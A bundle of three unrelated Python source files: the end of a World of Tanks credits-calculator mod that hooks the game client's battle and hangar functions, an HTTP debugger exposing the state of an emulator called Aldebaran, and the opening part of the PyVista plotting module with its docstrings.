"Бой до последнего" # heavyTank # '17783848134': None, #51201 ussr_R38_KV-220_beta lvl:5 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=51201 #Выдавался Бэта-тестерам # '10670447814': None, #30721 ussr_R165_Object_703_II_2 lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=30721 #Этого танка нет ни у кого # '17161425606': None, #49409 ussr_R61_Object252_BF lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=49409 #ИС-6 Черный # '15471993030': None, #44545 ussr_R119_Object_777 lvl:9 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=44545 #Объект 777 Вариант II, в разработке # '10581530310': None, #30465 ussr_R172_Object_752 lvl:9 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=30465 #Объект 752, в разработке # '21251630790': None, #61185 ussr_R119_Object_777C lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=61185 #Объект 777 Вариант II С, в разработке # '17517095622': None, #50433 ussr_R129_Object_257 lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=50433 #Объект 257 (П), только КИТАЙ # AT-SPG # '21607300806': None, #62209 ussr_R121_KV4_KTT lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62209 #КВ-4 КТТС По слухам полностью отмененный танк, но присутствует в ангаре у многих старых супер тестеров # '17606013126': None, #50689 ussr_R126_Object_730_5 lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=50689 #Объект 268 вариант 5, Этого танка нет ни у кого }) class p__Flash(object): def p__startBattle(self): if not p__config.p__data['battle_show']: return if not p__g_flash: return p__g_flash.createComponent('credits', p__COMPONENT_TYPE.PANEL, { 'x' : p__config.p__data['battle_x'], 'y' : p__config.p__data['battle_y'], 'width' : 1, 'height': 1, 'drag' : True, 'border': True, 'alignX': p__COMPONENT_ALIGN.LEFT, 'alignY': p__COMPONENT_ALIGN.BOTTOM}) p__g_flash.createComponent('credits.text', p__COMPONENT_TYPE.LABEL, { 'shadow': {"distance": 0, "angle": 0, "color": 0x000000, "alpha": 1, "blurX": 1, "blurY": 1, "strength": 1, "quality": 1}, 'text' : '', 'width': 168, 'height': 25, 'index': 1, 'multiline': True, 'tooltip': '+1000 or -1000 it\'s normal calc\nIf calc incorrect, play battle without damage to fix it.\nFull time replays, no escape!!!'}) if p__config.p__data['battle_background']: p__g_flash.createComponent('credits.image', p__COMPONENT_TYPE.IMAGE, { 'width': 168, 'height': 25, 'index': 0, 'image': '../maps/icons/quests/inBattleHint.png'}) p__COMPONENT_EVENT.UPDATED += self.p__update def p__stopBattle(self): if not p__config.p__data['battle_show']: return if not p__g_flash: return p__COMPONENT_EVENT.UPDATED -= self.p__update p__g_flash.deleteComponent('credits.text') if p__config.p__data['battle_background']: p__g_flash.deleteComponent('credits.image') p__g_flash.deleteComponent('credits') def p__update(self, alias, props): if not p__config.p__data['battle_show']: return if str(alias) == str('credits'): x = int(props.get('x', p__config.p__data['battle_x'])) if x and x != int(p__config.p__data['battle_x']): p__config.p__data['battle_x'] = x y = int(props.get('y', p__config.p__data['battle_y'])) if y and y != int(p__config.p__data['battle_y']): p__config.p__data['battle_y'] = y p__config.p__apply(p__config.p__data) # p__g_flash.updateComponent('credits.text', p__data) # print '%s Flash coordinates updated : y = %i, x = %i, props: %s' % (alias, p__config.p__data['battle_y'], p__config.p__data['battle_x'], props) def setCreditsText(self, text, width=0, height=0): if not p__config.p__data['battle_show']: return if not p__g_flash: return data = {'visible': True, 'text': text} if width: data['width'] = width if height: data['width'] = height p__g_flash.updateComponent('credits.text', data) def p__visible(self, status): if not p__config.p__data['battle_show']: return p__g_flash.updateComponent('credits', {'visible': status}) class p__BattleResultParser(object): def __init__(self): self.p__Threads = True self.p__ArenaIDQueue = p__Queue() self.ResultsCache = [] self.ResultsAvailable = p__threading.Event() self.thread = p__threading.Thread(target=self.WaitResult) self.thread.setDaemon(True) self.thread.setName('WaitResult') self.thread.start() def CheckCallback(self, ArenaUniqueID, ErrorCode, battleResults): if ErrorCode in [-3, -5]: p__BigWorld.callback(1.0, lambda: self.p__ArenaIDQueue.put(ArenaUniqueID)) elif ErrorCode >= 0: if ArenaUniqueID in self.ResultsCache: return p__calc.p__receiveBattleResult(True, battleResults) # print battleResults.get('arenaUniqueID') # print battleResults.get('personal') # print battleResults.get('common') def WaitResult(self): while self.p__Threads: ArenaUniqueID = self.p__ArenaIDQueue.get() self.ResultsAvailable.wait() try: p__BigWorld.player().battleResultsCache.get(ArenaUniqueID, p__partial(self.CheckCallback, ArenaUniqueID)) except Exception as e: pass p__config = p__Config() p__flashInHangar = flashInHangar() p__flash = p__Flash() p__calc = p__CreditsCalculator() p__results = p__BattleResultParser() def p__hook_start_battle(*args): if p__BigWorld.player().arena.bonusType == p__ARENA_BONUS_TYPE.REGULAR: p__calc.p__timer() p__hooked_start_battle(*args) def p__hook_before_delete(*args): if p__BigWorld.player().arena.bonusType == p__ARENA_BONUS_TYPE.REGULAR: p__calc.p__stopBattle() p__hooked_before_delete(*args) def p__hook_CrewMeta_as_tankmenResponseS(self, p__data): if p__g_currentVehicle.item: try: status = p__g_currentVehicle.itemsCache.items.stats.activePremiumExpiryTime > 0 except Exception as e: status = False try: p__calc.p__getHangarData(status) except Exception as e: print 'ERROR: creditCalc crew:', e return p__hooked_CrewMeta_as_tankmenResponseS(self, p__data) def p__hook_onBattleEvents(self, events): p__hooked_onBattleEvents(self, events) if p__BigWorld.player().arena.bonusType == p__ARENA_BONUS_TYPE.REGULAR: p__calc.p__onBattleEvents(events) def p__hook_LobbyPopulate(self): p__hooked_LobbyPopulate(self) p__BigWorld.callback(3.0, p__calc.p__hangarMessage) def p__hook_BattleResultsFormatter_format(self, message, *args): arenaUniqueID = message.data.get('arenaUniqueID', 0) p__results.p__ArenaIDQueue.put(arenaUniqueID) return p__hooked_BattleResultsFormatter_format(self, message, *args) def p__onAccountBecomePlayer(): p__results.ResultsAvailable.set() def p__IntoBattle(): p__results.ResultsAvailable.clear() p__hooked_start_battle = p__PlayerAvatar._PlayerAvatar__startGUI p__hooked_before_delete = p__PlayerAvatar._PlayerAvatar__destroyGUI p__hooked_onBattleEvents = p__PlayerAvatar.onBattleEvents p__hooked_CrewMeta_as_tankmenResponseS = p__CrewMeta.as_tankmenResponseS p__hooked_LobbyPopulate = p__LobbyView._populate p__hooked_BattleResultsFormatter_format = p__BattleResultsFormatter.format p__PlayerAvatar._PlayerAvatar__startGUI = p__hook_start_battle p__PlayerAvatar._PlayerAvatar__destroyGUI = p__hook_before_delete p__PlayerAvatar.onBattleEvents = p__hook_onBattleEvents p__CrewMeta.as_tankmenResponseS = p__hook_CrewMeta_as_tankmenResponseS p__LobbyView._populate = p__hook_LobbyPopulate p__BattleResultsFormatter.format = p__hook_BattleResultsFormatter_format p__g_playerEvents.onBattleResultsReceived += p__calc.p__receiveBattleResult p__g_playerEvents.onAvatarReady += p__IntoBattle p__g_playerEvents.onAccountBecomePlayer += p__onAccountBecomePlayer def fini(): p__results.p__Threads = False def p__jsonGenerator(nations): from CurrentVehicle import g_currentVehicle as p__g_currentVehicle import ResMgr as p__ResMgr import os as p__os import codecs as p__codecs import json as p__json p__COEFFICIENTS = {} resMgr = p__ResMgr.openSection('../version.xml') if resMgr is None: resMgr = p__ResMgr.openSection('version.xml') if resMgr is None: resMgr = p__ResMgr.openSection('./version.xml') ver = 'temp' if resMgr is None else resMgr.readString('version') i1 = ver.find('.') i2 = ver.find('#') p__PATH = ''.join(['./res_mods/', ver[i1 + 1:i2 - 1], '/system/']) if p__os.path.isfile(p__PATH + 'sw_templates.json'): try: with p__codecs.open(p__PATH + 'sw_templates.json', 'r', encoding='utf-8-sig') as p__json_file: p__data = p__json_file.read().decode('utf-8-sig') p__COEFFICIENTS.update(p__calc.p__byte_ify(p__json.loads(p__data))) p__json_file.close() except Exception as e: p__COEFFICIENTS.update({}) def p__deCode(p__compactDescr): test = '%s' % (p__compactDescr * 2847 * 122) if test in p__COEFFICIENTS: return test, round(p__COEFFICIENTS[test] / 1231 / 487 * 0.0001, 6) return test, 0.0 items = p__g_currentVehicle.itemsCache.items.getVehicles() def getData(nation, role, found): text = '' for level in xrange(1, 11): for compactDescr in items: vehicle = items[compactDescr] if vehicle.nationName == nation and vehicle.descriptor.level == level and vehicle.type == role: vehicleCompDesc, balanceCoeff = p__deCode(compactDescr) thatPremium = ' !!!!PREMIUM' if vehicle.isPremium or vehicle.isPremiumIGR else '' details = '#%s %s lvl:%s coeff:%s%s' % (compactDescr, vehicle.name.replace(':', '_'), vehicle.descriptor.level, balanceCoeff, thatPremium) if not found and not balanceCoeff: text += "#'%s': %s, %s https://premomer.org/tank.php?id=%s\n" % (vehicleCompDesc, None, details, compactDescr) if found and balanceCoeff: text += "'%s': %s, %s\n" % (vehicleCompDesc, p__COEFFICIENTS[vehicleCompDesc], details) if text: print '# %s' % role print text if not nations: nations = ['ussr', 'germany', 'uk', 'japan', 'usa', 'china', 'france', 'czech', 'sweden', 'poland', 'italy'] roles = ['lightTank', 'mediumTank', 'heavyTank', 'AT-SPG', 'SPG'] print '########################### DATA ###########################' for nation in nations: print '# %s' % nation for role in roles: getData(nation, role, True) print '$$$$$$$$$$$$$$$$$$$$$$$$$$$ DATA $$$$$$$$$$$$$$$$$$$$$$$$$$$' for nation in nations: print '# %s' % nation for role in roles: getData(nation, role, False) print '!!!!!!!!!!!!!!!!!!!!!!!!!!! DONE !!!!!!!!!!!!!!!!!!!!!!!!!!!' p__BigWorld.flashInHangar = p__flashInHangar
debugger.py
''' Debugger to show Aldebaran's internal state ''' import json import logging import threading from http import HTTPStatus from urllib.parse import urlparse, parse_qs from instructions.operands import WORD_REGISTERS, operand_to_str from utils import config from utils import utils from utils.errors import ArchitectureError, AldebaranError from utils.utils import GenericRequestHandler, GenericServer from hardware.memory.memory import SegfaultError logger = logging.getLogger(__name__) class Debugger: ''' Debugger API endpoints: GET /cpu GET /memory?offset=&length= GET /stack ''' def __init__(self, host, port): self._server = GenericServer((host, port), GenericRequestHandler, self._handle_get, self._handle_post) self._input_thread = threading.Thread(target=self._server.serve_forever) self._user_log = [] self.cpu = None self.clock = None self.memory = None self.architecture_registered = False def register_architecture(self, cpu, clock, memory): ''' Register other internal devices ''' self.cpu = cpu self.clock = clock self.memory = memory self.architecture_registered = True def start(self): ''' Start input thread ''' if not self.architecture_registered: raise ArchitectureError('Debugger cannot run without registering architecture') logger.info('Starting...') self._input_thread.start() logger.info('Started.') def stop(self): ''' Stop input thread ''' logger.info('Stopping...') self._server.shutdown() self._server.server_close() self._input_thread.join() logger.info('Stopped.') def user_log(self, message): ''' Append message to user log ''' self._user_log.append(message) def _handle_get(self, path): ''' Handle incoming GET request from Debugger frontend, called by GenericRequestHandler ''' parse_result = urlparse(path) path = parse_result.path query = parse_qs(parse_result.query) if path == '/api/internal': return self._get_internal_state() if path == '/api/memory': try: offset = int(query.get('offset')[0], 16) except Exception: offset = 0 try: length = int(query.get('length')[0], 16) except Exception: length = 256 return self._get_memory(offset, length) return ( HTTPStatus.BAD_REQUEST, { 'error': 'Unknown path', } ) def _get_internal_state(self): registers = { name: utils.word_to_str(self.cpu.registers.get_register(name, silent=True)) for name in WORD_REGISTERS } registers['IP'] = utils.word_to_str(self.cpu.ip) registers['entry_point'] = utils.word_to_str(self.cpu.system_addresses['entry_point']) if self.cpu.last_ip is not None: last_instruction = self._get_instruction(self.cpu.last_ip) last_ip = utils.word_to_str(self.cpu.last_ip) else: last_instruction = None last_ip = None if self.cpu.shutdown: next_instruction = None next_ip = None else: next_instruction = self._get_instruction(self.cpu.ip) next_ip = utils.word_to_str(self.cpu.ip) return ( HTTPStatus.OK, { 'registers': registers, 'stack': self._get_stack(), 'cpu': { 'halt': self.cpu.halt, 'shutdown': self.cpu.shutdown, 'last_instruction': last_instruction, 'last_ip': last_ip, 'next_instruction': next_instruction, 'next_ip': next_ip, }, 'clock': { 'cycle_count': self.clock.cycle_count, }, 'user_log': self._user_log, } ) def _get_memory(self, offset, length): if offset >= config.memory_size or offset < 0: return ( HTTPStatus.BAD_REQUEST, { 'error': 'Cannot access memory beyond 0000-{}'.format(utils.word_to_str(config.memory_size - 1)), } ) if offset + length > config.memory_size: length = config.memory_size - offset first_address = offset content = [] for idx in range(length): try: content.append(utils.byte_to_str(self.memory.read_byte(first_address + idx))) except SegfaultError: content.append(None) return ( HTTPStatus.OK, { 'first_address': utils.word_to_str(first_address), 'last_address': utils.word_to_str(first_address + length - 1), 'content': content, } ) def _get_stack(self): bottom_of_stack = self.cpu.system_addresses['bottom_of_stack'] first_address = max(self.cpu.registers.get_register('SP', silent=True) - 7, 0) length = bottom_of_stack - first_address + 1 return { 'first_address': utils.word_to_str(first_address), 'last_address': utils.word_to_str(bottom_of_stack), 'content': [ utils.byte_to_str(self.memory.read_byte(first_address + idx)) for idx in range(length) ], } def _get_instruction(self, ip): inst_opcode, operand_buffer = self.cpu.read_instruction(ip) try: instruction = self.cpu.parse_instruction(inst_opcode, operand_buffer) except AldebaranError: return None last_idx = 0 operands = [] for op, idx in zip(instruction.operands, instruction.operand_buffer_indices): operands.append({ 'name': operand_to_str(op), 'opcode': utils.binary_to_str(operand_buffer[last_idx:idx]), }) last_idx = idx return { 'name': instruction.__class__.__name__, 'opcode': utils.byte_to_str(inst_opcode), 'operands': operands, } def _handle_post(self, path, headers, rfile): ''' Handle incoming POST request from Debugger frontend, called by GenericRequestHandler ''' parse_result = urlparse(path) path = parse_result.path try: request_body_length = int(headers.get('Content-Length')) except TypeError: return (HTTPStatus.LENGTH_REQUIRED, None) data = rfile.read(request_body_length) try: data = json.loads(data) except json.decoder.JSONDecodeError: return ( HTTPStatus.BAD_REQUEST, { 'error': 'Could not parse data.', } ) if path == '/api/cpu/step': self.clock.debugger_queue.put({ 'action': 'step', 'data': data, }) return ( HTTPStatus.OK, {} )
plotting.py
"""PyVista plotting module.""" import collections.abc import ctypes from functools import wraps import io import logging import os import pathlib import platform import textwrap from threading import Thread import time from typing import Dict import warnings import weakref import numpy as np import scooby import pyvista from pyvista import _vtk from pyvista.utilities import ( abstract_class, assert_empty_kwargs, convert_array, get_array, is_pyvista_dataset, numpy_to_texture, raise_not_matching, wrap, ) from ..utilities.misc import PyvistaDeprecationWarning from ..utilities.regression import image_from_window from ._plotting import _has_matplotlib, prepare_smooth_shading, process_opacity from .colors import Color, get_cmap_safe from .export_vtkjs import export_plotter_vtkjs from .mapper import make_mapper from .picking import PickingHelper from .render_window_interactor import RenderWindowInteractor from .renderer import Camera, Renderer from .renderers import Renderers from .scalar_bars import ScalarBars from .tools import FONTS, normalize, opacity_transfer_function, parse_font_family # noqa from .widgets import WidgetHelper SUPPORTED_FORMATS = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"] VERY_FIRST_RENDER = True # windows plotter helper # EXPERIMENTAL: permit pyvista to kill the render window KILL_DISPLAY = platform.system() == 'Linux' and os.environ.get('PYVISTA_KILL_DISPLAY') if KILL_DISPLAY: # pragma: no cover # this won't work under wayland try: X11 = ctypes.CDLL("libX11.so") X11.XCloseDisplay.argtypes = [ctypes.c_void_p] except OSError: warnings.warn('PYVISTA_KILL_DISPLAY: Unable to load X11.\nProbably using wayland') KILL_DISPLAY = False def close_all(): """Close all open/active plotters and clean up memory. Returns ------- bool ``True`` when all plotters have been closed. """ for _, p in _ALL_PLOTTERS.items(): if not p._closed: p.close() p.deep_clean() _ALL_PLOTTERS.clear() return True log = logging.getLogger(__name__) log.setLevel('CRITICAL') log.addHandler(logging.StreamHandler()) def _warn_xserver(): # pragma: no cover """Check if plotting is supported and persist this state. Check once and cache this value between calls. Warn the user if plotting is not supported. Configured to check on Linux and Mac OS since the Windows check is not quick. """ # disable windows check until we can get a fast way of verifying # if windows has a windows manager (which it generally does) if os.name == 'nt': return if not hasattr(_warn_xserver, 'has_support'): _warn_xserver.has_support = pyvista.system_supports_plotting() if not _warn_xserver.has_support: # check if a display has been set if 'DISPLAY' in os.environ: return # finally, check if using a backend that doesn't require an xserver if pyvista.global_theme.jupyter_backend in ['ipygany', 'pythreejs']: return # Check if VTK has EGL support ren_win_str = str(type(_vtk.vtkRenderWindow())) if 'EGL' in ren_win_str or 'OSOpenGL' in ren_win_str: return warnings.warn( '\n' 'This system does not appear to be running an xserver.\n' 'PyVista will likely segfault when rendering.\n\n' 'Try starting a virtual frame buffer with xvfb, or using\n ' ' ``pyvista.start_xvfb()``\n' ) USE_SCALAR_BAR_ARGS = """ "stitle" is a depreciated keyword and will be removed in a future release. Use ``scalar_bar_args`` instead. For example: scalar_bar_args={'title': 'Scalar Bar Title'} """ @abstract_class class BasePlotter(PickingHelper, WidgetHelper): """To be used by the Plotter and pyvistaqt.QtInteractor classes. Parameters ---------- shape : list or tuple, optional Number of sub-render windows inside of the main window. Specify two across with ``shape=(2, 1)`` and a two by two grid with ``shape=(2, 2)``. By default there is only one renderer. Can also accept a string descriptor as shape. E.g.: * ``shape="3|1"`` means 3 plots on the left and 1 on the right, * ``shape="4/2"`` means 4 plots on top and 2 at the bottom. border : bool, optional Draw a border around each render window. Default ``False``. border_color : color_like, optional Either a string, rgb list, or hex color string. For example: * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` border_width : float, optional Width of the border in pixels when enabled. title : str, optional Window title of the scalar bar lighting : str, optional What lighting to set up for the plotter. Accepted options: * ``'light_kit'``: a vtk Light Kit composed of 5 lights. * ``'three lights'``: illumination using 3 lights. * ``'none'``: no light sources at instantiation. The default is a Light Kit (to be precise, 5 separate lights that act like a Light Kit). theme : pyvista.themes.DefaultTheme, optional Plot-specific theme. """ mouse_position = None click_position = None def __init__( self, shape=(1, 1), border=None, border_color='k', border_width=2.0, title=None, splitting_position=None, groups=None, row_weights=None, col_weights=None, lighting='light kit', theme=None, ): """Initialize base plotter.""" log.debug('BasePlotter init start') self._theme = pyvista.themes.DefaultTheme() if theme is None: # copy global theme to ensure local plot theme is fixed # after creation. self._theme.load_theme(pyvista.global_theme) else: if not isinstance(theme, pyvista.themes.DefaultTheme): raise TypeError( 'Expected ``pyvista.themes.DefaultTheme`` for ' f'``theme``, not {type(theme).__name__}.' ) self._theme.load_theme(theme) self.image_transparent_background = self._theme.transparent_background # optional function to be called prior to closing self.__before_close_callback = None self._store_image = False self.mesh = None if title is None: title = self._theme.title self.title = str(title) # add renderers self.renderers = Renderers( self, shape, splitting_position, row_weights, col_weights, groups, border, border_color, border_width, ) # This keeps track of scalars names already plotted and their ranges self._scalar_bars = ScalarBars(self) # track if the camera has been set up self._first_time = True # Keep track of the scale # track if render window has ever been rendered self._rendered = False # this helps managing closed plotters self._closed = False # lighting style; be forgiving with input (accept underscores # and ignore case) lighting_normalized = str(lighting).replace('_', ' ').lower() if lighting_normalized == 'light kit': self.enable_lightkit() elif lighting_normalized == 'three lights': self.enable_3_lights() elif lighting_normalized != 'none': raise ValueError(f'Invalid lighting option "{lighting}".') # Add self to open plotters self._id_name = f"{hex(id(self))}-{len(_ALL_PLOTTERS)}" _ALL_PLOTTERS[self._id_name] = self # Key bindings self.reset_key_events() log.debug('BasePlotter init stop') self._image_depth_null = None self.last_image_depth = None self.last_image = None self._has_background_layer = False # set hidden line removal based on theme if self.theme.hidden_line_removal: self.enable_hidden_line_removal() # set antialiasing based on theme if self.theme.antialiasing: self.enable_anti_aliasing() @property def theme(self): """Return or set the theme used for this plotter. Examples -------- Use the dark theme for a plotter. >>> import pyvista >>> from pyvista import themes >>> pl = pyvista.Plotter() >>> pl.theme = themes.DarkTheme() >>> actor = pl.add_mesh(pyvista.Sphere()) >>> pl.show() """ return self._theme @theme.setter def theme(self, theme): if not isinstance(theme, pyvista.themes.DefaultTheme): raise TypeError( 'Expected a pyvista theme like ' '``pyvista.themes.DefaultTheme``, ' f'not {type(theme).__name__}.' ) self._theme.load_theme(theme) def import_gltf(self, filename, set_camera=True): """Import a glTF file into the plotter. See https://www.khronos.org/gltf/ for more information. Parameters ---------- filename : str Path to the glTF file. set_camera : bool, optional Set the camera viewing angle to one compatible with the default three.js perspective (``'xy'``). Examples -------- >>> import pyvista >>> from pyvista import examples >>> helmet_file = examples.gltf.download_damaged_helmet() # doctest:+SKIP >>> texture = examples.hdr.download_dikhololo_night() # doctest:+SKIP >>> pl = pyvista.Plotter() # doctest:+SKIP >>> pl.import_gltf(helmet_file) # doctest:+SKIP >>> pl.set_environment_texture(cubemap) # doctest:+SKIP >>> pl.camera.zoom(1.8) # doctest:+SKIP >>> pl.show() # doctest:+SKIP See :ref:`load_gltf` for a full example using this method. """ if not _vtk.VTK9: # pragma: no cover from pyvista.core.errors import VTKVersionError raise VTKVersionError('Support for glTF requires VTK v9 or newer') filename = os.path.abspath(os.path.expanduser(str(filename))) if not os.path.isfile(filename): raise FileNotFoundError(f'Unable to locate {filename}') # lazy import here to avoid importing unused modules from vtkmodules.vtkIOImport import vtkGLTFImporter importer = vtkGLTFImporter() importer.SetFileName(filename) importer.SetRenderWindow(self.ren_win) importer.Update() # register last actor in actors actor = self.renderer.GetActors().GetLastItem() name = actor.GetAddressAsString("") self.renderer._actors[name] = actor # set camera position to a three.js viewing perspective if set_camera: self.camera_position = 'xy' def export_html(self, filename): """Export this plotter as an interactive scene to a HTML file. Parameters ---------- filename : str Path to export the html file to. Notes ----- You will need ``ipywidgets`` and ``pythreejs`` installed for this feature. Examples -------- >>> import pyvista >>> from pyvista import examples >>> mesh = examples.load_uniform() >>> pl = pyvista.Plotter(shape=(1,2)) >>> _ = pl.add_mesh(mesh, scalars='Spatial Point Data', show_edges=True) >>> pl.subplot(0,1) >>> _ = pl.add_mesh(mesh, scalars='Spatial Cell Data', show_edges=True) >>> pl.export_html('pyvista.html') # doctest:+SKIP """ pythreejs_renderer = self.to_pythreejs() # import after converting as we check for pythreejs import first try: from ipywidgets.embed import embed_minimal_html except ImportError: # pragma: no cover raise ImportError('Please install ipywidgets with:\n' '\n\tpip install ipywidgets') # convert and write to file embed_minimal_html(filename, views=[pythreejs_renderer], title=self.title) def to_pythreejs(self): """Convert this plotting scene to a pythreejs renderer. Returns ------- ipywidgets.Widget Widget containing pythreejs renderer. """ self._on_first_render_request() # set up camera from pyvista.jupyter.pv_pythreejs import convert_plotter return convert_plotter(self) def export_gltf(self, filename, inline_data=True, rotate_scene=True, save_normals=True): """Export the current rendering scene as a glTF file. Visit https://gltf-viewer.donmccurdy.com/ for an online viewer. See https://vtk.org/doc/nightly/html/classvtkGLTFExporter.html for limitations regarding the exporter. Parameters ---------- filename : str Path to export the gltf file to. inline_data : bool, optional Sets if the binary data be included in the json file as a base64 string. When ``True``, only one file is exported. rotate_scene : bool, optional Rotate scene to be compatible with the glTF specifications. save_normals : bool, optional Saves the point array ``'Normals'`` as ``'NORMALS'`` in the outputted scene. Examples -------- Output a simple point cloud represented as balls. >>> import numpy as np >>> import pyvista >>> point_cloud = np.random.random((100, 3)) >>> pdata = pyvista.PolyData(point_cloud) >>> pdata['orig_sphere'] = np.arange(100) >>> sphere = pyvista.Sphere(radius=0.02) >>> pc = pdata.glyph(scale=False, geom=sphere) >>> pl = pyvista.Plotter() >>> _ = pl.add_mesh(pc, cmap='reds', smooth_shading=True, ... show_scalar_bar=False) >>> pl.export_gltf('balls.gltf') # doctest:+SKIP >>> pl.show() Output the orientation plotter. >>> from pyvista import demos >>> pl = demos.orientation_plotter() >>> pl.export_gltf('orientation_plotter.gltf') # doctest:+SKIP >>> pl.show() """ if not _vtk.VTK9: # pragma: no cover from pyvista.core.errors import VTKVersionError raise VTKVersionError('Support for glTF requires VTK v9 or newer') if not hasattr(self, "ren_win"): raise RuntimeError('This plotter has been closed and is unable to export the scene.') from vtkmodules.vtkIOExport import vtkGLTFExporter # rotate scene to gltf compatible view if rotate_scene: for renderer in self.renderers: for actor in renderer.actors.values(): if hasattr(actor, 'RotateX'): actor.RotateX(-90) actor.RotateZ(-90) if save_normals: try: mapper = actor.GetMapper() if mapper is None: continue dataset = mapper.GetInputAsDataSet() if 'Normals' in dataset.point_data: # ensure normals are active normals = dataset.point_data['Normals'] dataset.point_data.active_normals = normals.copy() except: # noqa: E722 pass exporter = vtkGLTFExporter() exporter.SetRenderWindow(self.ren_win) exporter.SetFileName(filename) exporter.SetInlineData(inline_data) exporter.SetSaveNormal(save_normals) exporter.Update() # rotate back if applicable if rotate_scene: for renderer in self.renderers: for actor in renderer.actors.values(): if hasattr(actor, 'RotateX'): actor.RotateZ(90) actor.RotateX(90) def enable_hidden_line_removal(self, all_renderers=True): """Enable hidden line removal. Wireframe geometry will be drawn using hidden line removal if the rendering engine supports it. Disable this with :func:`disable_hidden_line_removal <BasePlotter.disable_hidden_line_removal>` Parameters ---------- all_renderers : bool If ``True``, applies to all renderers in subplots. If ``False``, then only applies to the active renderer. Examples -------- Create a side-by-side plotter and render a sphere in wireframe with hidden line removal enabled on the left and disabled on the right. >>> import pyvista >>> sphere = pyvista.Sphere(theta_resolution=20, phi_resolution=20) >>> pl = pyvista.Plotter(shape=(1, 2)) >>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe') >>> _ = pl.add_text("With hidden line removal") >>> pl.enable_hidden_line_removal(all_renderers=False) >>> pl.subplot(0, 1) >>> pl.disable_hidden_line_removal(all_renderers=False) >>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe') >>> _ = pl.add_text("Without hidden line removal") >>> pl.show() """ if all_renderers: for renderer in self.renderers: renderer.enable_hidden_line_removal() else: self.renderer.enable_hidden_line_removal() def disable_hidden_line_removal(self, all_renderers=True): """Disable hidden line removal. Enable again with :func:`enable_hidden_line_removal <BasePlotter.enable_hidden_line_removal>` Parameters ---------- all_renderers : bool If ``True``, applies to all renderers in subplots. If ``False``, then only applies to the active renderer. Examples -------- Enable and then disable hidden line removal. >>> import pyvista >>> pl = pyvista.Plotter() >>> pl.enable_hidden_line_removal() >>> pl.disable_hidden_line_removal() """ if all_renderers: for renderer in self.renderers: renderer.disable_hidden_line_removal() else: self.renderer.disable_hidden_line_removal() @property def scalar_bar(self): """First scalar bar. Kept for backwards compatibility.""" return list(self.scalar_bars.values())[0] @property def scalar_bars(self): """Scalar bars. Examples -------- >>> import pyvista >>> sphere = pyvista.Sphere() >>> sphere['Data'] = sphere.points[:, 2] >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(sphere) >>> plotter.scalar_bars Scalar Bar Title Interactive "Data" False Select a scalar bar actor based on the title of the bar. >>> plotter.scalar_bars['Data'] # doctest:+SKIP (vtkmodules.vtkRenderingAnnotation.vtkScalarBarActor)0x7fcd3567ca00 """ return self._scalar_bars @property def _before_close_callback(self): """Return the cached function (expecting a reference).""" if self.__before_close_callback is not None: return self.__before_close_callback() @_before_close_callback.setter def _before_close_callback(self, func): """Store a weakref.ref of the function being called.""" if func is not None: self.__before_close_callback = weakref.ref(func) else: self.__before_close_callback = None @property def shape(self): """Shape of the plotter. Examples -------- Return the plotter shape. >>> import pyvista >>> plotter = pyvista.Plotter(shape=(2, 2)) >>> plotter.shape (2, 2) """ return self.renderers._shape @property def renderer(self): """Return the active renderer. Examples -------- >>> import pyvista >>> pl = pyvista.Plotter() >>> pl.renderer # doctest:+SKIP (Renderer)0x7f916129bfa0 """ return self.renderers.active_renderer @property def store_image(self): """Store last rendered frame on close. This is normally disabled to avoid caching the image, and is enabled by default by setting: ``pyvista.BUILDING_GALLERY = True`` Examples -------- >>> import pyvista >>> pl = pyvista.Plotter(off_screen=True) >>> pl.store_image = True >>> _ = pl.add_mesh(pyvista.Cube()) >>> pl.show() >>> image = pl.last_image >>> type(image) # doctest:+SKIP <class 'numpy.ndarray'> """ return self._store_image @store_image.setter def store_image(self, value): """Store last rendered frame on close.""" self._store_image = bool(value) def subplot(self, index_row, index_column=None): """Set the active subplot. Parameters ---------- index_row : int Index of the subplot to activate along the rows. index_column : int Index of the subplot to activate along the columns. Examples -------- Create a 2 wide plot and set the background of right-hand plot to orange. Add a cube to the left plot and a sphere to the right. >>> import pyvista >>> pl = pyvista.Plotter(shape=(1, 2)) >>> actor = pl.add_mesh(pyvista.Cube()) >>> pl.subplot(0, 1) >>> actor = pl.add_mesh(pyvista.Sphere()) >>> pl.set_background('orange', all_renderers=False) >>> pl.show() """ self.renderers.set_active_renderer(index_row, index_column) @wraps(Renderer.add_legend) def add_legend(self, *args, **kwargs): """Wrap ``Renderer.add_legend``.""" return self.renderer.add_legend(*args, **kwargs) @wraps(Renderer.remove_legend) def remove_legend(self, *args, **kwargs): """Wrap ``Renderer.remove_legend``.""" return self.renderer.remove_legend(*args, **kwargs) @property def legend(self): """Legend actor. There can only be one legend actor per renderer. If ``legend`` is ``None``, there is no legend actor. """ return self.renderer.legend @wraps(Renderer.add_floor) def add_floor(self, *args, **kwargs): """Wrap ``Renderer.add_floor``.""" return self.renderer.add_floor(*args, **kwargs) @wraps(Renderer.remove_floors) def remove_floors(self, *args, **kwargs): """Wrap ``Renderer.remove_floors``.""" return self.renderer.remove_floors(*args, **kwargs) def enable_3_lights(self, only_active=False): """Enable 3-lights illumination. This will replace all pre-existing lights in the scene. Parameters ---------- only_active : bool If ``True``, only change the active renderer. The default is that every renderer is affected. Examples -------- >>> from pyvista import demos >>> pl = demos.orientation_plotter() >>> pl.enable_3_lights() >>> pl.show() Note how this varies from the default plotting. >>> pl = demos.orientation_plotter() >>> pl.show() """ def _to_pos(elevation, azimuth): theta = azimuth * np.pi / 180.0 phi = (90.0 - elevation) * np.pi / 180.0 x = np.sin(theta) * np.sin(phi) y = np.cos(phi) z = np.cos(theta) * np.sin(phi) return x, y, z renderers = [self.renderer] 